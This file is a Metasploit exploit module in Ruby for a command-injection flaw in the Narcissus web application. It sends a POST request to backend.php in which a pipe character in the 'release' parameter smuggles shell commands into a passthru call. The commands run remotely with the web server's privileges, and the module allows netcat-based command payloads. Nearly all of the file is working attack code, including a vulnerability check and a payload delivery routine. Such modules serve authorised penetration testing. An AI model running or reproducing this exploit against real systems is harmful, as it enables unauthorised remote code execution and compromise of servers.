##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Narcissus Image Configuration Passthru Vulnerability",
        'Description' => %q{
          This module exploits a vulnerability found in Narcissus image configuration
          function.  This is due to the backend.php file not handling the $release parameter
          properly, and then passes it on to the configure_image() function.  In this
          function, the $release parameter can be used to inject system commands for
          passthru (a PHP function that's meant to be used to run a bash script by the
          vulnerable application), which allows remote code execution under the context
          of the web server.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Dun', # Original
          'sinn3r' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2012-10033' ],
          [ 'EDB', '22709' ],
          [ 'OSVDB', '87410' ]
        ],
        'Payload' => {
          'BadChars' => "\x00\x0d\x0a",
          'Compat' =>
                        {
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'generic perl ruby python netcat netcat-e'
                        },
        },
        'Platform' => %w{linux unix},
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['Narcissus', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-11-14',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to the web application', '/narcissus-master/'])
      ]
    )
  end

  def base
    uri = target_uri.path
    uri << '/' if uri[-1, 1] != '/'
    return uri
  end

  def remote_exe(command)
    res = send_request_cgi({
      'uri' => "#{base}backend.php",
      'method' => 'POST',
      'encode_params' => false,
      'vars_post' => {
        'machine' => '0',
        'action' => 'configure_image',
        'release' => "|#{command}"
      }
    })

    vprint_line(res.body) if res
    return res
  end

  def check
    sig = rand_text_alpha(rand(10) + 5) # The string to check

    vprint_status("Looking for signature '#{sig}'...")
    res = remote_exe("echo #{sig}")

    if res and res.body =~ /#{sig}/
      vprint_status("Signature '#{sig}' found.")
      return Exploit::CheckCode::Vulnerable
    else
      vprint_status("Signature not found")
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("Sending malicious request...")
    remote_exe(payload.encoded)
  end

end